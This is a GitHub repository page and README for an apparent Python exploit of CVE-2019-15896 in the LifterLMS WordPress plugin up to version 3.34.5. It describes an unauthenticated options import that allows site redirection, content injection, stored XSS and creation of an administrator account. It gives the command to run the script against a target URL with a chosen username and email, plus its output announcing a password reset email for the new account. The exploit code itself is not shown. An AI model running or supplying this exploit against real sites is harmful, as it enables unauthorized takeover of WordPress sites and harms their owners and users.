https://github.com/randomrobbiebf/cve-2019-15896
LifterLMS <= 3.34.5 - Unauthenticated Options Import
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2019-15896
- Owner: RandomRobbieBF
- License: gpl-3.0
- Created: 2023-08-22T18:56:09.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2023-08-22T18:59:15.000Z (over 1 year ago)
- Last Synced: 2023-08-22T22:57:26.358Z (over 1 year ago)
- Language: Python
- Size: 17.6 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# CVE-2019-15896
LifterLMS <= 3.34.5 - Unauthenticated Options Import

# Description
Unauthenticated Options Import, which could lead to:
- Website Redirection
- Administrator Account Creation
- Content Injection
- Stored XSS
The issues have been reported as fixed in 3.35.0. However v3.35.1 added additional input sanitisation and filtering.

How to use
---
```
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email [email protected]
LifterLMS <= 3.34.5 - Unauthenticated Options Import
Exploit By Ramdom Robbie
Once ran check your email for the forgotten password link.
Password reset email sent to [email protected]
```

Info
---
```
Requires access to login.php and working email address and the site needs to be able to send emails
```